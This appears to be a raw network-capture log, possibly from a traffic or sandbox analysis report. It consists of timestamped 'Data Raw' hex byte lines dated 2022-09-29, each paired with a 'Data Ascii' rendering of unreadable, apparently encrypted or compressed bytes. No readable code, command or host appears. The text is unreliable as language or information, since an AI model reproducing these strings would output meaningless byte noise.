                                                                                                                                                            2022-09-29 12:45:03 UTC9223INData Raw: de 17 49 fa 8a 47 78 33 34 53 a6 61 ca d9 1e 78 dd 04 0a 5e 70 b2 cc 17 88 1c b1 33 17 52 3e cd 15 20 20 58 33 c4 1f af a5 98 b2 22 ef 33 a6 43 82 64 ef ba 57 1d fb 01 cb ae 11 6a bd a7 a3 4b c6 9e 03 fc 58 a0 45 59 66 d5 ba 77 55 ff 59 5f a1 16 04 7e 7f 25 7e e7 bc f2 66 6c 7c b7 87 0c c4 68 06 aa aa 79 7e 61 ce 12 9c c8 d0 2f 89 e3 8e 66 21 85 59 6e 2f 41 41 8e e5 90 bb 27 1f 37 80 f5 87 69 d0 40 40 95 f4 34 87 b6 73 09 0b a2 8f b7 9c ab a8 61 a9 ad f8 c0 b9 a5 fa 1a 36 80 22 04 fb ba 28 f2 dd cf 03 01 cf 92 d1 25 5d 52 3c d6 81 f0 ad 7d 29 ad 20 ca b4 29 c7 84 b5 f3 3c 55 ab 45 c2 35 f2 0f 23 5c af 72 b6 9d c6 78 ee 9f 94 31 9f e4 86 d5 a0 03 66 be 5b 25 d7 c7 e4 72 ae 36 89 80 bb 34 38 06 1e 6d 3d b3 12 10 2d 83 e3 b9 9c 54 3c ff e8 dd 9f 4b 58 74 99
                                                                                                                                                            Data Ascii: IGx34Sax^p3R> X3"3CdWjKXEYfwUY_~%~fl|hy~a/f!Yn/AA'7i@@4sa6"(%]R<}) )<UE5#\rx1f[%r648m=-T<KXt
                                                                                                                                                            2022-09-29 12:45:03 UTC9239INData Raw: c5 5d f1 7e 64 1e 8f f5 57 93 e3 cc 30 9f 91 c3 e7 21 0d 96 eb fa 40 52 40 a3 58 f5 ec 2c be 6f 79 cd e5 83 e3 de f4 2b ba c1 ea a8 23 23 cf 89 b5 00 20 20 c0 c4 08 cd fd a0 d9 5e d5 bb 58 ef 2a d9 cd c8 03 32 f1 14 68 b8 7b f0 f7 3a 63 3c 10 31 29 51 a1 a5 ef da 7c ea 2d d0 75 4d 15 2f 19 c8 bf bd 21 ac c1 88 b3 fe df 88 f0 80 cb 7a 19 70 c8 a8 18 e7 a4 27 cd 60 2f a8 3c b5 cb 23 6d 05 99 ed 39 bd 67 aa 2d 51 b6 d5 4f ee 95 cd 44 f8 80 36 98 ba ff 4b 20 62 53 80 b1 24 9f fe d1 60 64 f9 7d fe c7 fb 5b a1 a1 6a 2a 5f fb ec 00 20 bb c0 52 b6 b9 8d 5f 05 da 9d 30 2a 1f 33 b4 f3 d9 b3 65 71 6e 73 d4 fa 7f d9 18 8e 37 92 92 fd c0 34 d4 f3 dd a8 bc 9e d5 65 8c 5c 4a 4f 53 2d 65 6d d5 a6 4b 9c 3e 8a 19 b3 4e 93 ce 34 54 a9 cb f4 59 97 c3 2a 10 d8 f9 4c 57 94 46
                                                                                                                                                            Data Ascii: ]~dW0!@R@X,oy+## ^X*2h{:c<1)Q|-uM/!zp'`/<#m9g-QOD6K bS$`d}[j*_ R_0*3eqns74e\JOS-emK>N4TY*LWF
                                                                                                                                                            2022-09-29 12:45:03 UTC9255INData Raw: b4 1b 52 6d ef 37 e4 35 94 b2 46 45 1c d2 e8 8a 7b 8b 7d 43 d4 c9 dc b7 c3 4f 34 20 e2 e3 e3 14 5e 7b 78 62 e1 b8 21 21 67 65 ec 10 4d bf 1f cd a9 51 79 c9 96 81 6c bd b4 2f e7 f8 65 d6 dc dc 89 b5 e4 ca 3c 83 a3 46 6a c2 e6 f9 d1 c5 2f f5 8d b3 29 d0 2f f2 5a 4e 4b c5 bc ae 68 bc 76 ac a3 91 2d bf 04 75 ba 48 de fc de 33 23 38 11 e8 9f a6 0b 94 5f 92 71 7c 9c b9 c9 29 ea 73 1f b2 c3 8b 1c d1 b8 1f cf 4d 81 45 47 96 96 09 28 0a d4 6f 3a de 8a b5 04 fe 24 3c 1d ea 86 37 69 e3 d1 d0 6f b0 34 ec f3 07 f9 d2 c9 cf 48 ed b9 c2 48 9a 3a c5 ed 18 fe 6f 28 6e 32 2e 5d 0b cb e4 92 04 b0 54 94 d7 b0 5f 16 72 cd 5e 5a 5e f6 3c 56 e3 08 bd 31 62 9c 43 4c 96 a3 e2 8e d3 a1 79 3d 1b b9 e1 17 5d 59 02 8e 41 58 f9 69 9e 25 22 d3 e1 b2 40 ba 05 ba d0 af c4 9b 66 b2 88 8f
                                                                                                                                                            Data Ascii: Rm75FE{}CO4 ^{xb!!geMQyl/e<Fj/)/ZNKhv-uH3#8_q|)sMEG(o:$<7io4HH:o(n2.]T_r^Z^<V1bCLy=]YAXi%"@f
                                                                                                                                                            2022-09-29 12:45:03 UTC9271INData Raw: c0 68 59 42 24 33 ee e9 5c 9c b3 62 49 45 8e 73 db 69 a3 cc 75 a0 4c e6 61 08 b9 c8 cf 30 b1 36 d4 de 08 5a ca ef 54 02 19 83 f5 e4 f1 2b f3 cb 79 32 4c 50 21 9d a8 41 61 67 c5 d4 46 7a ba ab 1f 28 8a d1 be a1 e7 29 e3 2a f2 a8 9e fb 92 d2 01 c6 57 05 0e a3 db 36 1d ea 96 c6 b1 bc 6d 24 c9 2e 6b 74 5c 48 e3 61 71 fe 37 b7 bf 42 fd 0b 8c 3c fd 48 6c f4 58 8a 47 29 09 0d ac 7a 15 c7 37 1c 4d 47 aa e4 9f 5a 54 7b b6 64 31 33 15 aa 3a bf ee 02 4e 9e fb a2 69 2b c4 a9 b4 2e 38 f8 04 74 a4 f6 b8 a4 7f 86 52 63 f2 c7 b6 6c 37 3f 5f 72 90 e9 08 80 5c 44 0c 9a 97 1a 18 6f 10 16 2b 6a 91 9a 97 44 84 05 97 39 a2 8e 75 f4 03 63 f4 53 a7 d2 15 2a 81 a4 f5 26 f7 b6 d9 19 04 2d ce e2 39 22 8d 65 ab db 61 9a ea 1c 07 a7 eb d5 b7 88 1c 37 a5 cc f1 f3 56 03 e0 1b db 73 1c
                                                                                                                                                            Data Ascii: hYB$3\bIEsiuLa06ZT+y2LP!AagFz()*W6m$.kt\Haq7B<HlXG)z7MGZT{d13:Ni+.8tRcl7?_r\Do+jD9ucS*&-9"ea7Vs
                                                                                                                                                            2022-09-29 12:45:03 UTC9287INData Raw: d2 f9 a2 8e aa 02 12 e5 10 59 ab 52 e9 22 5f c2 7d a7 63 43 01 7b 10 76 d0 97 f0 a7 f1 5c 17 44 9c 4f 0d ce 91 95 aa e0 07 67 d7 87 ff 12 d6 24 2a 63 b5 4e c8 32 f4 04 6d 92 84 a6 10 41 95 4e d0 bf 46 26 ee cd 13 76 5d ab ea 84 a8 37 90 60 28 dd 60 54 ba b0 ea c0 a6 d7 b9 f0 f7 e7 0f 44 1e 74 4a 95 70 8e e4 97 6b cb cc ab 68 dd e3 c8 0b 95 a6 c3 78 95 c5 ae 78 62 ad c2 f3 04 0e 67 38 80 a9 17 d8 5c aa 89 4c c7 92 2b 3e 1a 2e 0d c0 ef 94 57 3f 0b ff aa c2 c5 cc 63 da d9 47 f7 01 30 ac ef 19 61 77 c9 03 6d 79 91 5e 40 4a 73 b1 96 17 28 d7 3e 26 92 14 a9 ee fe ed 9e 52 db f2 53 43 b1 0e 0b 2e 09 ae 0e 88 47 25 c8 92 cc 4e 62 79 f0 d4 1d 37 5e 29 23 61 8d 3e e8 cf 57 7c 07 e7 eb f4 20 66 17 7c 7f ae 5d c2 80 29 a4 19 5b 31 45 15 19 de 8e 37 0f f0 a9 75 0f eb
                                                                                                                                                            Data Ascii: YR"_}cC{v\DOg$*cN2mANF&v]7`(`TDtJpkhxxbg8\L+>.W?cG0awmy^@Js(>&RSC.G%Nby7^)#a>W| f|])[1E7u
                                                                                                                                                            2022-09-29 12:45:03 UTC9303INData Raw: b4 ab bc a7 68 bd 12 be ec fd fc 3a cd 56 28 a0 c5 6d 89 6f a8 be f2 05 41 8c dc 86 4a e8 46 25 4f fd fb c8 65 cd c1 c6 b8 30 55 ee 18 be 57 0d c1 ad 44 5c 4e 03 67 2c 34 57 fc d5 a2 a8 23 33 b9 ae 26 2e f6 9e d2 78 00 d6 31 0b a1 91 4f 69 72 e3 43 de fa 6a ea d7 39 7e f6 4b 16 5d 43 2b a6 ee a1 e2 0f 83 6b de fa 91 1e 50 9d 4f 57 a3 fd e2 82 12 aa 33 21 f4 ae b9 62 42 74 d9 b7 59 0c b4 be cf aa fa 39 f3 84 17 90 c1 34 50 05 9b 4f 28 8f e6 a0 12 af 49 e2 a4 c9 6c b0 3f 52 ce 1e 37 9a f7 aa 06 66 64 c3 22 d9 35 c4 17 98 8b be b8 67 10 dc f1 97 56 2f 39 60 4e 3c 82 69 cc c8 2a c7 e2 f8 42 a6 b4 f0 8f 12 ac 78 73 7a 7a 48 e0 ff 2e f2 b4 e9 92 8d 78 80 b3 0b a0 4b c0 2f 3e 30 fa 17 3f ae b0 95 e4 4c 1d 60 2c 56 bd 89 17 25 4c dc a9 f9 11 82 14 fe 6d 3c a4 19
                                                                                                                                                            Data Ascii: h:V(moAJF%Oe0UWD\Ng,4W#3&.x1OirCj9~K]C+kPOW3!bBtY94PO(Il?R7fd"5gV/9`N<i*BxszzH.xK/>0?L`,V%Lm<
                                                                                                                                                            2022-09-29 12:45:03 UTC9319INData Raw: b0 f2 7f 9b 99 4b d1 d4 28 92 1e b6 95 c3 22 fd 52 1b 4a 62 24 d7 61 55 71 72 cc ad d8 6f fb 70 f5 4d 5a 88 74 a7 38 f4 11 b0 cf 69 07 c1 a2 06 58 c4 ed 65 74 b1 09 98 5d ea 8a f8 f5 65 40 a2 ee 7d 00 b6 cf 87 8d 48 1e 09 e1 f2 42 e2 77 81 2a 96 cf 23 eb 23 68 4c 31 22 3e 95 cd 08 cf 54 bf 7c 2e 98 e9 56 17 59 44 10 e8 5f cd 01 47 e9 83 11 7a 90 61 51 79 62 5a 51 3e c6 b5 c8 6f 9e 7b 6a 8f 13 18 14 2a af 86 7f ec fd 10 2e e9 26 43 5f 2a 02 f5 1d 72 5b cc 9d b9 90 4e 98 ff f5 0e a5 83 68 4d 72 92 a1 c0 37 eb 26 cb 85 ed 61 d3 7e 83 b8 ba 86 6d 9b 3d b8 d7 0d 52 68 c4 75 42 06 5e fc d6 ab 73 fe d2 74 9f 0c 67 d7 f2 82 34 40 9c 14 d4 04 5d ad 38 39 20 30 33 e6 4b 55 e7 4a 9c 02 62 93 eb b6 ba 9b 50 07 3b 51 29 0c 64 c6 eb f4 a4 c0 5f 71 6f 35 8e 7c b1 2b d8
                                                                                                                                                            Data Ascii: K("RJb$aUqropMZt8iXet]e@}HBw*##hL1">T|.VYD_GzaQybZQ>o{j*.&C_*r[NhMr7&a~m=RhuB^stg4@]89 03KUJbP;Q)d_qo5|+
                                                                                                                                                            2022-09-29 12:45:03 UTC9335INData Raw: 81 a5 39 53 87 83 81 cb 70 1e 86 19 f8 f8 12 c1 03 47 bc 6b cf 47 15 d4 ec 27 54 57 e0 67 71 f8 b9 a4 22 a1 56 a5 49 5a 06 94 13 dd d6 b4 e4 7e bc 2e d9 2d 37 88 61 89 7d 06 a3 f7 56 c8 25 65 df 70 84 6e 08 00 25 f3 66 93 fd 5c 6d 30 a0 de f6 00 59 5d 06 0e 10 16 3b 82 f9 87 26 42 20 26 e9 70 06 7c 72 a8 3c 10 0d e2 97 e8 73 f8 6c 8d 0a 7f b4 0e 45 45 fc 2d 30 b7 af ad 6e f3 53 d0 e4 5b e9 3e 50 c8 ba 3f 5b 8e 3c 29 64 66 b2 62 19 33 9d 71 ca 25 ba 7c 11 94 f5 a7 2a bb 5f 6f af 9a 1b 18 7c de 1a b8 a4 4f 31 21 15 49 1a 72 15 32 4b 8c 1a 6b 7e 97 2a ce 26 d4 e8 3a c0 e6 b7 47 2b 42 a7 1d d2 a6 72 4a 4e 3c 02 56 bd 73 3a a4 3d f2 68 8c 95 5a 98 69 2a 81 12 bc ae 3d d2 3d c0 e5 0a 9a d6 be 8c a9 91 62 ee 41 ea dc 07 92 e1 74 5b 8c 6b 19 bb 94 f3 69 90 e2 a6
                                                                                                                                                            Data Ascii: 9SpGkG'TWgq"VIZ~.-7a}V%epn%f\m0Y];&B &p|r<slEE-0nS[>P?[<)dfb3q%|*_o|O1!Ir2Kk~*&:G+BrJN<Vs:=hZi*==bAt[ki
                                                                                                                                                            2022-09-29 12:45:03 UTC9351INData Raw: 2b be 71 9d 17 00 24 82 e4 0c 4e fe 12 83 32 82 a6 0a 7f db 8c 49 dd bb b0 9b 10 59 dd a3 cd 55 bb 3e a3 fc 3b 52 e3 36 dd 16 ef 9a 0b ff ad 03 41 04 1e 0d 80 28 63 5c 9b ad e2 16 52 de 07 b5 5c 62 ff 63 12 76 e4 04 aa a4 11 ff 0b f0 82 46 11 e5 d1 2e 67 ca f9 9d 08 31 c0 5a f4 6b aa 63 f0 56 01 78 a5 49 c4 4c 22 a0 0c 31 42 ad 86 33 43 06 a4 89 d4 5b 4f 51 3c b8 92 c6 00 a5 5a 1a e7 e0 f8 e8 d0 77 6e 3b 14 75 e7 94 be 2a fa 83 57 5c c0 dc 2a ad 3f 78 26 37 4a 88 32 00 0c 68 76 62 c9 93 43 19 80 aa 70 aa 78 3a a0 35 15 e3 4f d7 64 f9 b6 26 a9 da c4 71 bd 5e e2 7c fa 52 c3 4e c1 08 4b 6a 25 70 3d 18 69 ce 62 e6 db a2 7b 63 81 d0 90 5b 09 96 2c 3a b9 ec f5 d6 2c 6c 80 d3 70 3b ab 52 d0 9e 2f 5d 6e 0d b0 c2 4a a5 f3 19 da f8 7a cd ea c4 be 82 86 c4 c5 62 4c
                                                                                                                                                            Data Ascii: +q$N2IYU>;R6A(c\R\bcvF.g1ZkcVxIL"1B3C[OQ<Zwn;u*W\*?x&7J2hvbCpx:5Od&q^|RNKj%p=ib{c[,:,lp;R/]nJzbL
                                                                                                                                                            2022-09-29 12:45:03 UTC9367INData Raw: fa 8e bb cf fb 20 97 fd f1 32 7b a0 45 34 92 f3 c1 af 9d 2d 80 52 fc c5 32 96 07 fd 80 24 60 c9 ff 6e 42 c1 45 6b 5e 69 a1 e5 ac 92 e3 fa 96 b1 0c 64 89 39 01 28 b2 f4 91 85 c7 aa 56 33 70 4b 10 c1 9f 8f f9 7a 6f 2b 3c db 75 a8 d5 3f c5 8e 96 85 19 68 2b 2f db 17 f4 df be ba 3b d9 c7 3e e6 22 95 8d 3d a1 81 30 dd 7c 6a 08 b6 2d f7 6b 9c 81 a1 72 ea f2 56 c4 45 bc 24 69 64 44 10 a1 d6 0b b6 72 58 b5 6b 3f d7 5e 3a d6 72 11 b8 37 e7 5b 5a 24 ff 06 4b b8 58 2c 28 0f 27 7f 96 8a ec 67 ec b6 4f 06 7a ac 63 19 3d 03 4e 90 e0 f4 67 80 82 ed 90 69 e8 43 24 3f f0 91 5c 99 c3 56 e9 ae b5 7d df 9e b0 35 3f 84 c8 ab 46 92 b6 2b 6f 20 d4 7b de 0f 4f 35 06 b6 0a 48 bd 99 d7 87 8d e1 57 37 9a 76 dd 73 6b 17 ab a8 87 ed ce 2e 31 0b 57 a2 6a 29 8c 68 fa 7f 9b 3a 2c b7 0a
                                                                                                                                                            Data Ascii: 2{E4-R2$`nBEk^id9(V3pKzo+<u?h+/;>"=0|j-krVE$idDrXk?^:r7[Z$KX,('gOzc=NgiC$?\V}5?F+o {O5HW7vsk.1Wj)h:,
                                                                                                                                                            2022-09-29 12:45:03 UTC9377INData Raw: 9e ea a6 d1 f5 e1 4c ee 17 15 42 c4 5c d4 ec e8 2f 1f 16 8f a5 e2 44 38 e8 9f 17 a6 9b a7 29 5a 8a 57 b2 f8 94 b8 65 f2 04 02 5e ab cc 6b 95 f0 8b 19 05 5f 10 e8 43 79 55 14 2f 25 9f 1c cb b3 32 cd ba c0 f7 6d 29 1d ec b2 41 cb df a3 63 3a 14 46 6c 1d b5 c2 42 99 7d 3a 69 45 52 1b ff 09 77 2b 8c 81 28 46 05 94 f5 40 21 dd 3b 53 55 51 5f ca f5 85 c5 d6 ef c4 44 f6 b1 b1 36 81 8e 3b cd 26 0b 2d d2 ec f4 a1 cf f8 47 f4 f6 f4 f7 16 e5 cb 77 d4 20 27 76 c9 49 e5 3f f5 87 63 8f 67 55 10 ca e9 ea 21 b0 d1 4b 6e 01 7f 2f 65 e5 2d 49 6c 3e 5e a2 fe ef 7b fb d3 94 0d c4 88 e7 28 b6 c7 7d b3 99 5c 8f df 6a b3 49 1f 44 9e c5 81 75 b6 e7 f0 54 1e d4 0f dc 36 db f1 06 dd 4b 07 e1 7d e4 15 cc e6 7b 86 5f 5c 86 65 2c 17 6a f2 96 5e 82 52 36 58 29 fc d3 26 96 57 24 ee 93
                                                                                                                                                            Data Ascii: LB\/D8)ZWe^k_CyU/%2m)Ac:FlB}:iERw+(F@!;SUQ_D6;&-Gw 'vI?cgU!Kn/e-Il>^{(}\jIDuT6K}{_\e,j^R6X)&W$
                                                                                                                                                            2022-09-29 12:45:03 UTC9393INData Raw: 10 1c 96 90 fb df 4d 90 a0 8b 4f 69 03 5a 10 68 04 cd 33 5b 92 2b f2 1a fb 66 ba 12 dd fa 1c 9d 24 bc 49 28 60 1e 91 63 20 81 60 f8 70 5c 0c bf fc 39 83 7d e5 03 41 9f 2a f8 fb 3f 7c 27 14 25 e0 70 c5 3a 5d 15 06 86 a4 81 53 25 8d ef 02 15 b4 56 ed 9b cd 05 95 3c 31 c9 f3 5b ba d8 33 5c 80 a7 5d db 8b 93 54 60 f5 81 ae da 88 b3 30 7d 2d a8 5e 54 b5 44 b4 f1 7a 6b 88 5a db f2 29 f8 68 ee 19 1f 3d 39 19 c1 93 82 05 61 13 d8 9d 91 8d 17 20 e0 f9 3c c4 82 b9 e7 1b 3a f8 5f 2f 0a 07 a4 6f 07 f1 a0 04 00 a7 84 14 8e b3 42 41 9e e1 02 9a 3b 57 ca 8c c6 67 95 74 83 1e a2 bd 3f 72 68 0d d0 c6 4a 85 89 4a e2 a8 c7 bf 0b 5c 16 20 99 e4 73 91 2f 13 49 61 a4 f5 2e cc 04 9a 10 9a 30 99 f5 50 f4 ee cd dd 4b 41 44 e2 f5 66 c8 e9 64 fe 48 60 ac 8e f3 d9 91 95 6b 66 cc 2f
                                                                                                                                                            Data Ascii: MOiZh3[+f$I(`c `p\9}A*?|'%p:]S%V<1[3\]T`0}-^TDzkZ)h=9a <:_/oBA;Wgt?rhJJ\ s/Ia.0PKADfdH`kf/
                                                                                                                                                            2022-09-29 12:45:03 UTC9409INData Raw: 99 c9 a0 13 60 c0 99 21 f5 d8 18 b7 e6 19 b0 e5 81 48 b9 62 1a 6c 46 c8 a5 f9 2a 80 ac df 57 26 b7 29 ed 92 ff 94 71 9c 41 11 e6 a8 b1 dc 44 f6 6b 5a 7a f2 36 4d 92 3e 2b bc 62 a2 dd 07 de fe 39 b1 1a cd bc 09 72 db 6d 83 1f 01 49 4b 33 1a 90 1f df 7a 57 6d cb d7 09 b8 05 86 9d 0f d8 a5 e9 69 af a2 3f e9 21 bc b8 37 77 76 5f a6 21 7f 8b 62 ab 44 23 49 8d 81 8c fb 7b 20 82 69 57 ea 61 be 06 0b a8 da b6 ad ef fd 67 a0 4e e2 e4 9e 65 a6 15 6f 7f 7d c9 4f fc 15 b9 c8 ae f2 76 b6 01 42 63 d4 94 1a 83 d8 a2 07 db 41 e3 5c 74 84 7f f0 ed d8 db 67 74 1d 4f 83 28 90 69 c0 df 11 88 a5 41 e1 31 e0 25 54 29 9d e6 87 03 c1 8b fd 27 4a a5 58 46 d1 5a 78 c8 2a cc 30 a1 bb 1e 48 22 3c b3 69 a9 75 1d b0 7d 79 ad 01 fd 5a 42 ef 84 45 8e 96 bd d0 57 cf f0 7b 72 b2 2a 7e f7
                                                                                                                                                            Data Ascii: `!HblF*W&)qADkZz6M>+b9rmIK3zWmi?!7wv_!bD#I{ iWagNeo}OvBcA\tgtO(iA1%T)'JXFZx*0H"<iu}yZBEW{r*~
                                                                                                                                                            2022-09-29 12:45:03 UTC9425INData Raw: df 28 8f 42 99 61 b0 73 5d cc f1 bd 7f 5d 17 4f a0 20 b1 2c c5 61 9c da 92 09 0d 8e 78 eb d1 54 bf f4 0e 7b fd 85 6b eb 00 49 4d df 13 9b 71 29 18 a2 75 59 0c 7d cb 47 0a c1 db 9f d9 60 f5 eb 1f e6 d3 44 0b 2c ad 02 85 d1 49 52 2b 9f 3b 6d 21 67 b2 c5 8a b9 5b 73 85 c4 96 25 29 ef e1 a4 a2 7e 9c 6e c9 b0 a7 30 32 36 31 97 2c 5e c7 a8 7c c7 53 0e 46 60 c3 95 12 f0 09 a6 fa e6 3d 74 10 14 85 fe 4a 7e 95 63 7d 89 0b 3c 56 7c e4 c1 b4 f2 d4 b1 1a f9 79 99 ee 5e c8 f2 ae 4b 9e 48 56 46 d2 75 5e 90 3d c9 7c 87 9c c7 66 be aa ec 92 70 23 76 91 b7 e9 02 32 c6 40 9c 38 91 4d ef 92 e5 59 35 3b 41 f9 76 76 94 c5 8f fd 16 ad d0 b9 c9 a9 da 1d bd fd db 89 98 15 80 2b c6 7c 29 ca 44 29 d7 ec c3 89 f1 43 da bb 55 7b fb a6 27 be ba d7 58 f3 fd 4b ec c1 1d a8 61 38 91 53
                                                                                                                                                            Data Ascii: (Bas]]O ,axT{kIMq)uY}G`D,IR+;m!g[s%)~n0261,^|SF`=tJ~c}<V|y^KHVFu^=|fp#v2@8MY5;Avv+|)D)CU{'XKa8S
                                                                                                                                                            2022-09-29 12:45:03 UTC9441INData Raw: 74 4a 71 04 1d 9a fa 09 4e be 7d 3d b3 9d 64 ad 36 ca 23 a6 44 ec a7 82 44 62 8c 78 8e c5 a8 72 f6 10 a7 d1 5a 36 79 1b e9 0e 01 ea 1c 72 bd 3e 25 1c b1 3f f2 a6 4b 6e f9 a6 88 da 50 12 2f 39 32 0a 08 ad 78 41 cd 9b 42 37 24 f3 7d 92 74 13 47 bc 31 b5 12 b6 ab 70 b7 94 12 25 8b 29 51 03 c6 c0 d2 40 f6 aa 76 b4 c5 a8 48 2e d5 be ab 4a 7f 5f 88 11 28 22 e4 92 3f e0 01 13 6a 45 cb 0e fa 46 e4 8d a0 71 15 3b d3 5e 2d 02 53 04 86 22 c3 d2 7f 97 1f fa 3c ce 26 36 d5 3f a6 e4 3f 0f 7b ff 11 77 fb 7c 51 f2 7e 60 15 f6 b9 c9 54 87 cb c0 03 de c2 ed 4e 12 37 73 db a4 0a e9 ff 46 fb b1 9d a3 3c 23 8f ec 48 e2 5b 03 41 5e f8 3e bb cf 2f 41 45 58 cf 37 e2 9b ff 2a 6f 75 8f d2 cf fd ae 27 c6 79 84 a0 60 9b 17 82 96 0c 74 a0 d7 12 d9 71 d0 44 b3 09 a2 87 a4 56 7b 4c bf
                                                                                                                                                            Data Ascii: tJqN}=d6#DDbxrZ6yr>%?KnP/92xAB7$}tG1p%)Q@vH.J_("?jEFq;^-S"<&6??{w|Q~`TN7sF<#H[A^>/AEX7*ou'y`tqDV{L
                                                                                                                                                            2022-09-29 12:45:03 UTC9457INData Raw: ed 8c 74 cb 51 c4 b5 17 7a 80 17 49 36 af 3c 43 1c e7 8d cb 6d 8f c3 16 63 f0 c6 17 39 fd d0 39 0c f9 fc d7 7e 35 28 73 76 6b 8b 03 5b ed d5 c2 e7 bc 59 a5 16 07 6f 88 ad 76 59 b9 d4 21 35 e6 36 64 41 b0 c9 fd 33 01 98 da 6e e2 2f f7 c9 88 1d 60 27 5f ef 34 7d 50 ee f6 32 47 18 ff c2 d8 e5 01 7a 97 ab f3 f2 ca 07 15 b2 0f b8 5d 70 dd be 6a e7 82 2d 52 7f 98 00 1b 63 75 0c 4d 78 b4 42 62 2b d3 ac 24 4f 80 84 13 41 07 5b 90 c6 af 98 71 99 6a bb b4 2a fa 81 5d cb 5b a7 6c 91 4b 58 e0 bb 37 03 66 16 a3 b9 46 d3 24 06 8f 3a 02 00 11 a3 15 09 c7 a4 45 01 bd 26 d7 e2 12 c6 91 8e 06 5d 08 15 bf 48 1e e9 78 5a 58 0d 31 34 50 1e 08 71 3a dc ec 84 e2 74 27 24 60 b3 e2 29 02 b2 10 76 12 66 e4 2e f5 1a 4d 71 50 de 2e 9e bc 99 6a 7f e2 4d fb b7 6f 89 f3 68 9a 64 39 d4
                                                                                                                                                            Data Ascii: tQzI6<Cmc99~5(svk[YovY!56dA3n/`'_4}P2Gz]pj-RcuMxBb+$OA[qj*][lKX7fF$:E&]HxZX14Pq:t'$`)vf.MqP.jMohd9
                                                                                                                                                            2022-09-29 12:45:03 UTC9473INData Raw: 71 d4 c8 7b 6d a8 4e 48 db dc e7 e8 ff c5 21 8c 38 ee 10 9d 1b 6c 75 6b 7d 65 89 48 45 1c ca 03 cf 92 7d 36 c6 c4 19 c0 ad d9 c5 07 8d d8 73 8c e1 09 63 1b e4 9e a5 4e ea 79 35 d1 a0 d3 5e c4 9a fa ff 34 1a 33 1b 3f 90 c8 d6 36 84 50 a5 05 0e f2 36 83 cc 06 e0 48 65 96 af c7 40 5a 1f 8a 78 ee 21 5f 5f da 17 86 55 2a 7e 82 bf 85 68 9d 11 72 fd 86 83 8d 7c 7d 97 d2 11 ad 81 42 96 cf 78 56 70 c2 89 92 e8 cb d6 e5 9b e4 45 49 69 f4 92 ec f6 bb a6 bc 38 90 18 f0 11 0e 26 41 f1 53 63 86 cf b3 9a 3e db a9 b6 f1 a4 3e cc 2f 11 3e 80 75 b1 a4 44 e9 f4 3d c2 bf e1 e2 96 f3 c6 9f 2c 36 56 2a 05 76 f8 dc b2 35 42 96 1e e5 3f 5d 76 a0 a3 8d c9 e1 77 81 d8 1b 80 48 d5 c3 61 16 3a 62 0b 24 d0 0f 31 a0 32 0b d6 4c dc ad 75 87 6e 70 bc 51 33 3d d1 4e bb 8c 15 e7 32 cd 4a
                                                                                                                                                            Data Ascii: q{mNH!8luk}eHE}6scNy5^43?6P6He@Zx!__U*~hr|}BxVpEIi8&ASc>>/>uD=,6V*v5B?]vwHa:b$12LunpQ3=N2J
                                                                                                                                                            2022-09-29 12:45:03 UTC9489INData Raw: 78 bb ff dd 12 16 e1 53 3e 65 30 61 e3 d6 e6 05 7f 52 68 fd 4c a5 7a 8c 7a 9b a9 cd 38 51 48 4f 0c 1f a8 44 34 ef 06 e6 ec 6e 16 da 7d d6 3a d2 e7 f5 48 28 fd 14 1d e7 14 56 27 fa 3c 4d 82 1c 61 15 83 98 0c 29 cd ef cd 85 b6 a0 59 b7 93 8e 9e cb 8d f8 57 e5 cc 1d e1 65 0c f9 5f 93 c3 03 de 2e 8a 6c 7e 58 33 1f 9a d9 fe d3 f5 1a 9f cd 71 32 7b 10 ec 89 8e b2 e2 fb 97 a3 5e da 62 f8 41 de 3b 99 ac 46 0b c9 0f a2 18 d2 3d b1 11 76 e1 e3 fa 9b e0 e3 66 4e d2 b0 82 b6 f6 05 66 5d 79 f7 69 b6 4c bb f3 69 3f 5b ad b8 95 f6 af ba d1 53 bf b7 b2 52 f1 ae 2a e3 31 53 40 75 b2 6f 86 40 01 b4 00 01 61 dc d1 e3 37 64 4d 10 4b 34 7b 90 79 69 90 0f 18 cc 40 9d 04 17 f4 96 9f 91 aa 78 d2 ac 10 9b 89 bb 19 3d 1e 07 16 e2 d8 ba 13 77 ec f0 a9 d5 59 13 59 7c ac 43 7b b3 46
                                                                                                                                                            Data Ascii: xS>e0aRhLzz8QHOD4n}:H(V'<Ma)YWe_.l~X3q2{^bA;F=vfNf]yiLi?[SR*1S@uo@a7dMK4{yi@x=wYY|C{F
                                                                                                                                                            2022-09-29 12:45:03 UTC9505INData Raw: 64 14 d0 3b b3 d1 0d 8b 6e c0 85 a0 9f c1 75 63 ad 83 b5 27 aa 2c 3d e1 4a 9c a7 ce 2c a0 aa 2b eb 48 53 82 b2 e6 30 aa 1b f9 43 ad 54 d3 7e 69 58 7b 08 b3 78 59 ea 9d b1 27 53 2f 2d d2 f8 b5 a3 1f 76 dc 97 0d ac 6d 8f 27 04 d9 e3 4f 42 62 e5 d0 eb 72 35 7e cd 0c eb e4 8a ef a2 3c 35 05 33 c7 a4 f4 cc 11 75 08 dc e7 a9 4a 3c 41 ba 34 77 9a f8 ff 72 cd 5b e2 2b 64 25 2e 12 8f 9c 2b 16 60 22 bd 0c f4 c2 ce 20 b5 82 38 2d e5 bc 3c 22 88 c1 25 93 32 d5 22 31 88 0c f2 b7 a0 6c 5f 54 44 fb 9c dd 13 85 28 13 fc 0f f7 03 ce 09 b5 31 16 35 19 50 22 88 22 67 54 0d ef 70 18 eb e2 d3 7b 39 99 43 f0 83 a0 46 9e cf 67 e3 ff 3f 78 af 27 d4 44 a3 b5 0b 38 74 d3 35 0b 0c 71 4e 60 d0 14 79 c1 96 c3 00 20 93 b2 2e 58 1c c5 ab 21 17 01 90 32 43 4b 67 b9 1e 1b d6 69 bf 21 9a
                                                                                                                                                            Data Ascii: d;nuc',=J,+HS0CT~iX{xY'S/-vm'OBbr5~<53uJ<A4wr[+d%.+`" 8-<"%2"1l_TD(15P""gTp{9CFg?x'D8t5qN`y .X!2CKgi!
